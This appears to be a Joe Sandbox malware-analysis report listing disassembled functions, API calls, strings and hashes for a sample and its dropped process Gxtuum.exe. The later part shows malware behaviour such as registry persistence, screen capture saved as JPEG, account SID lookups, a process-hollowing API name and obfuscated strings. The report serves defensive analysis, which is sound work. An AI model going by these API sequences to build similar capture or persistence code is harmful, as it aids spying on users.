Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\tOuVwTJrau.exe
API String ID: 0-2256859958
Opcode ID: fd364bfccd795d491ffe0323d2ef94acb0577467e8d961b21e45dbbfd16d362b
Instruction ID: f0ae12546d633442d8a9157e38fe1d4b1c916ebb0f34e644b62eee59764402d3
Opcode Fuzzy Hash: fd364bfccd795d491ffe0323d2ef94acb0577467e8d961b21e45dbbfd16d362b
Instruction Fuzzy Hash: 4D416071E00214AFDB2B9F9ADC81AEEFBBCEF9D310F150066F5089B251D6719A81CB50

Function 0030D4BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0030D4E1

Strings

MOC, xrefs: 0030D4F3
RCC, xrefs: 0030D4FB

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 31d386086be478e4b1bd5eb67cda12a1c6c29f4e85dced638387a0e8dada36af
Instruction ID: 7583c1ae89920079e68b7228e6ee942fd215f7bfd12cb122f9734ecfbcd9e0ca
Opcode Fuzzy Hash: 31d386086be478e4b1bd5eb67cda12a1c6c29f4e85dced638387a0e8dada36af
Instruction Fuzzy Hash: C241A971901209AFCF16DF98CC91AEEBBF5FF09308F198059F905AB291D3319A60CB65

Function 0031FF03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0031FCAD: GetOEMCP.KERNEL32(00000000,0031FF1E,?,?,0030F4C2,0030F4C2,?), ref: 0031FCD8

_free.LIBCMT ref: 0031FF7B

Strings

hf4, xrefs: 0031FFA3

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free
String ID: hf4
API String ID: 269201875-2878765854
Opcode ID: 25c88b214866638d9d6fed758adbbd9c8216051d5cf58775406a5eedb531913a
Instruction ID: 4422700326f41857cd63d1a86eb6f2149fdc0ecbd1228b8635e62910a2a92f62
Opcode Fuzzy Hash: 25c88b214866638d9d6fed758adbbd9c8216051d5cf58775406a5eedb531913a
Instruction Fuzzy Hash: 6531B471500209AFCB16DF58D881ADE77F5FF49310F114169F8109B2A1EB719D91CB50

Function 0030820A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00308292
RaiseException.KERNEL32(?,?,?,?), ref: 003082B7

Part of subcall function 0030B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00343A84,?,?,?,00343A84), ref: 0030B4A6

Part of subcall function 0030E364: IsProcessorFeaturePresent.KERNEL32(00000017,0031727C,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 0030E380

Strings

csm, xrefs: 00308246

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 0d17abdec118bd582c6343bbb7151aa2c511d34865e906f304f4394bcc62e65f
Instruction ID: 1ede0ba545ee1d28304bbcd0b3cb6832a798e49e4469d90b64ac63370f80a543
Opcode Fuzzy Hash: 0d17abdec118bd582c6343bbb7151aa2c511d34865e906f304f4394bcc62e65f
Instruction Fuzzy Hash: B421CF31D026189BCF36DF95C865AEEB7B9FF41710F560809E845AB294CB30AD45CB81

Function 003111C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003111F3
_free.LIBCMT ref: 00311219

Strings

0b4, xrefs: 00311280

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free
String ID: 0b4
API String ID: 269201875-2908078354
Opcode ID: c01efbd3f86124bad2aff74cffc1df9846ee38fa122d810a879642f7a2a3bf68
Instruction ID: 965c1779ff3c62463bf9f444192b2af17d182096c91d04e6c0fd4e9c41620047
Opcode Fuzzy Hash: c01efbd3f86124bad2aff74cffc1df9846ee38fa122d810a879642f7a2a3bf68
Instruction Fuzzy Hash: CA118179A002005ADF2A9F29AC95BDA739DA75BB30F150627F620DE1E0DA70E8C28741

Function 002E44C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002E44EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002E453A

Part of subcall function 00308D3E: _Yarn.LIBCPMT ref: 00308D5D
Part of subcall function 00308D3E: _Yarn.LIBCPMT ref: 00308D81

Strings

bad locale name, xrefs: 002E4556

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 01bff68bf480bf3642830fc355826f97aab6ff1cd46c9b49915cfbe34f55b45b
Instruction ID: 1544cdc8c0c83293175a90c4106765f72b053c37875e60957ba9959f69cba90c
Opcode Fuzzy Hash: 01bff68bf480bf3642830fc355826f97aab6ff1cd46c9b49915cfbe34f55b45b
Instruction Fuzzy Hash: 5311C271905B849FD321CF69C901747BBF8EF19710F008A1EE49AD7B81E775A504CB95

Function 00303910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00303997

Strings

|3, xrefs: 00303974
3, xrefs: 00303959

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: |3$3
API String ID: 323602529-2420565832
Opcode ID: ed71c17977cd93cc1cfc6d7eec6a44d03a7861069928279a36c30827df576010
Instruction ID: 238fdf8104b414b4001c730ff56c110f622da999fc2ac1cf0a3d39f4e4969be5
Opcode Fuzzy Hash: ed71c17977cd93cc1cfc6d7eec6a44d03a7861069928279a36c30827df576010
Instruction Fuzzy Hash: 15211A796002499FD721CF08D584F59FBE8FB49714F15869EE8089B391E771E906CBA0

Function 002E8630 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 002E86D7

Strings

3, xrefs: 002E8699
|3, xrefs: 002E86B4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: |3$3
API String ID: 323602529-2420565832
Opcode ID: 38406e4abcd03a0460354a1e2f6cd007d0339999693f31270f353e22dd003efa
Instruction ID: 58b9abcde2e69abab8630f0c79beb52a8c59d7a95fd63b1d1820ab9d39b769ba
Opcode Fuzzy Hash: 38406e4abcd03a0460354a1e2f6cd007d0339999693f31270f353e22dd003efa
Instruction Fuzzy Hash: BB21A378A40285CFEB22CF59C584E59BBE8FB09318F15899DE88A8B351D772E945CF40

Function 003218BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00321901

Strings

pN3, xrefs: 003218CF

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free
String ID: pN3
API String ID: 269201875-2056958687
Opcode ID: 8f21b27f4c00af122854dcf41f1b704f19e1ba18fde0407b849a86e93d6bf415
Instruction ID: f7e989793e70022c72dcd444b7bb32b7c1dccc83c4e53fa051c39820c66cd4a2
Opcode Fuzzy Hash: 8f21b27f4c00af122854dcf41f1b704f19e1ba18fde0407b849a86e93d6bf415
Instruction Fuzzy Hash: 4FF0CD334092346AE7172625BD41BD77799EBD5771F25003AF40C9E143DF61588141F5

Function 00308CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00308CDA
std::_Lockit::~_Lockit.LIBCPMT ref: 00308D35

Strings

`&0, xrefs: 00308CFF, 00308D19

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: `&0
API String ID: 593203224-1385275834
Opcode ID: efffb27b05e575e43093cc407649742e3fae8b2305425ef01e5692f201019c31
Instruction ID: de6d6935859d126ab71cdcb5a03422345dbbbb5224052334d4f40ffbce9e76f9
Opcode Fuzzy Hash: efffb27b05e575e43093cc407649742e3fae8b2305425ef01e5692f201019c31
Instruction Fuzzy Hash: 8D014C39601114AFCB06DB14C8A5E9DBBB9EF94710F1540AAE8019B2A1DF70EE41CAA0

Function 0030A0D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0030A0E4
___raise_securityfailure.LIBCMT ref: 0030A1A1

Strings

S]1, xrefs: 0030A14F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: S]1
API String ID: 3761405300-3480251096
Opcode ID: 77f06915d17420f1f26b3dd0d627db3e6beabfb368df7dc65412b5ddddfc2486
Instruction ID: 0b7436f072a9bb2232a678d3ea57b9c8264ee38a68601a914eff7cba5f1a1c17
Opcode Fuzzy Hash: 77f06915d17420f1f26b3dd0d627db3e6beabfb368df7dc65412b5ddddfc2486
Instruction Fuzzy Hash: 85119DBC514204DED706DF19FC817867BB9BB1A344F00911BE9098F3A0EBB0A549CF55

Function 00318E49 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00317562,-00000020,00000FA0,00000000,0034447C,00000000), ref: 00318E89

Strings

InitializeCriticalSectionEx, xrefs: 00318E59
`&0, xrefs: 00318E79

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$`&0
API String ID: 2593887523-1897320756
Opcode ID: 47a151e36b17532f906c72a122c13068a7df9e695c1b506e385d7ce90adaaa3e
Instruction ID: be4220d6a237515ae6d5c64422d2a9b7bdb26e71a6cb2f877d30ef93f04b4fe4
Opcode Fuzzy Hash: 47a151e36b17532f906c72a122c13068a7df9e695c1b506e385d7ce90adaaa3e
Instruction Fuzzy Hash: 0CE09235240218B7CB172F41EC45CDF3F19EB447A0F088820FE0859161CBB14960ABD4

Function 00318CCF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00318D03

Strings

FlsAlloc, xrefs: 00318CDF
`&0, xrefs: 00318CF9

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$`&0
API String ID: 2773662609-1144036073
Opcode ID: 8530b24408c5d3ed10a06ce89b0fddbe7a2c56fe708464edc452bc249ec84d3b
Instruction ID: 5c61827c03271f6fa485a8cd8cd4566e5b1d36b0cbf34e5bc396690488d34744
Opcode Fuzzy Hash: 8530b24408c5d3ed10a06ce89b0fddbe7a2c56fe708464edc452bc249ec84d3b
Instruction Fuzzy Hash: AEE0C2356C4324B382172791AC86ADA79488B54BB1F044011FD04962A0DDA0094181DD

Function 00309A97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0030977F,?,00000003,00000003,?,003097B4,?,?,?,00000003,00000003,?,00309258,/.,00000001), ref: 00309AB0
GetSystemTimeAsFileTime.KERNEL32(?,?,?,0030977F,?,00000003,00000003,?,003097B4,?,?,?,00000003,00000003,?,00309258), ref: 00309AB4

Strings

`&0, xrefs: 00309AAA

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID: `&0
API String ID: 743729956-1385275834
Opcode ID: c0a53a94d56ba1009faef9a2e0733ba6c3a4a49bea99f942852bf579ba0ec3b9
Instruction ID: b5ef891fe929a466e12a3a9c3e168580d067153a8569f8402094a39b4f5a52f2
Opcode Fuzzy Hash: c0a53a94d56ba1009faef9a2e0733ba6c3a4a49bea99f942852bf579ba0ec3b9
Instruction Fuzzy Hash: 8ED0223A7020389BCB032B80FC045ADBBADEE09B21F080013E90987223CFA12C108BC0

Analysis Process: Gxtuum.exePID: 6968, Parent PID: 6808COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1440
Total number of Limit Nodes:	26

Executed Functions

Function 000E61F0 Relevance: 99.7, APIs: 40, Strings: 16, Instructions: 1737registrywindowfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
RegCloseKey.ADVAPI32(80000001), ref: 000E651A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD
Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
Part of subcall function 000E61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 000E68E0

RegCloseKey.ADVAPI32(80000002), ref: 000E6668
RegCloseKey.ADVAPI32(?), ref: 000E6D5E
GdiplusStartup.GDIPLUS(?,?,00000000,455139FB,00000000), ref: 000E6DEA
GetDC.USER32(00000000), ref: 000E6F62
RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E71CD
GetSystemMetrics.USER32(00000000), ref: 000E7226
GetSystemMetrics.USER32(00000000), ref: 000E722F
RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 000E7277
GetSystemMetrics.USER32(00000001), ref: 000E72CA
GetSystemMetrics.USER32(00000001), ref: 000E72D3
CreateCompatibleDC.GDI32(?), ref: 000E72DF
CreateCompatibleBitmap.GDI32(?,?,?), ref: 000E72F4
SelectObject.GDI32(00000000,00000000), ref: 000E7304
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 000E732A
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 000E733E
GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 000E735A
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 000E7387
GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 000E740E
SelectObject.GDI32(00000000,?), ref: 000E741B
DeleteObject.GDI32(00000000), ref: 000E7428
DeleteObject.GDI32(?), ref: 000E7430
ReleaseDC.USER32(00000000,?), ref: 000E743A
GdipDisposeImage.GDIPLUS(00000000), ref: 000E7441
GdiplusShutdown.GDIPLUS(?), ref: 000E74E3
GetUserNameA.ADVAPI32(?,?), ref: 000E75BA
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 000E7600
GetSidIdentifierAuthority.ADVAPI32(?), ref: 000E760D
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E7721
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 000E7748

Strings

YeleXM0NRv==, xrefs: 000E6FA9
MK1mbG==, xrefs: 000E76A8
PvAqKtr4MOi=, xrefs: 000E698C
0vAqKtr=, xrefs: 000E6F81
(, xrefs: 000E8206
Xq0f xLx, xrefs: 000E761C
PvAqKtr4MeK=, xrefs: 000E6A53
PvAqKtr4MeG=, xrefs: 000E69EE
stoi argument out of range, xrefs: 000E8048
NtUnmapViewOfSection, xrefs: 000E8158
, xrefs: 000E8140
invalid stoi argument, xrefs: 000E8057
image/jpeg, xrefs: 000E73A2
PvAqKtr4MXW=, xrefs: 000E6AB4
ntdll.dll, xrefs: 000E815D
OKVmbG==, xrefs: 000E7751

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
String ID: $($0vAqKtr=$MK1mbG==$NtUnmapViewOfSection$OKVmbG==$PvAqKtr4MOi=$PvAqKtr4MXW=$PvAqKtr4MeG=$PvAqKtr4MeK=$Xq0f xLx$YeleXM0NRv==$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
API String ID: 1729688432-2403203450
Opcode ID: 8c85f6bfab81463327512143d77e6d89d30a4214b70ea90278b00604431ce84a
Instruction ID: fecab7532b2ecc797bced97e34e906cbbad1d7e42fd37441656de5bfdcbdab8f
Opcode Fuzzy Hash: 8c85f6bfab81463327512143d77e6d89d30a4214b70ea90278b00604431ce84a
Instruction Fuzzy Hash: BBD2F371A002589FDB18DF28DC89BEDBB75EF55300F508298E409E72D2DB759AC48F91

Function 000F9F31 Relevance: 50.5, APIs: 2, Strings: 25, Instructions: 3256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00147494,0000000E,455139FB,?,00000000), ref: 000FAD5D

Strings

2LI=, xrefs: 000FB603
PCm, xrefs: 000FC9E7
---, xrefs: 000FB425
P?}, xrefs: 000FB9EB
2Phf, xrefs: 000FAFB1
mm, xrefs: 000FC9BE
PV}, xrefs: 000FB9D4
2vE=, xrefs: 000FB5A1
%, xrefs: 000FC39F
%, xrefs: 000FC09E
2LM=, xrefs: 000FC99F
2yxm, xrefs: 000F9F59, 000FA038
0s==, xrefs: 000FAFEB
RQ, xrefs: 000FBD36
246122658369, xrefs: 000FB5BB, 000FB61D, 000FC9B9
RQS, xrefs: 000FB7CF
RQ%, xrefs: 000FB6FD
RQ, xrefs: 000FB815
RQP, xrefs: 000FC0D2
RQM, xrefs: 000FC3D5
%, xrefs: 000FC133
RQE, xrefs: 000FBCDD
PXm, xrefs: 000FC9D2
= N, xrefs: 000FB3F8
OTBmbM5tbiKv, xrefs: 000FA331, 000FA672, 000FA9AA, 000FBA18, 000FBDB4, 000FC150

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AttributesFile
String ID: %$%$%$---$0s==$246122658369$2LI=$2LM=$2Phf$2vE=$2yxm$= N$OTBmbM5tbiKv$P?}$PCm$PV}$PXm$RQ$RQ%$RQE$RQM$RQP$RQS$RQ$mm
API String ID: 3188754299-1912422534
Opcode ID: c1604ee1f5e871550b20ebf0520fa2d6df9d1fab7abe3e23dfba23bcdbc74072
Instruction ID: f65a78bc4012d3589a18d40f1aaba830951c021b788fe3d1fac55ed5be020d00
Opcode Fuzzy Hash: c1604ee1f5e871550b20ebf0520fa2d6df9d1fab7abe3e23dfba23bcdbc74072
Instruction Fuzzy Hash: BB434BB1A0024C9BEF08DB78CD4A7EDBB76AF51300F54819CE445A76C3DB759A84CB92

Function 000EB700 Relevance: 32.7, APIs: 12, Strings: 6, Instructions: 1232COMMON

Download Yara Rule

APIs

Part of subcall function 000EA270: GetTempPathA.KERNELBASE(00000104,?,455139FB,?,00000000), ref: 000EA2B7

GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 000EB77B

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
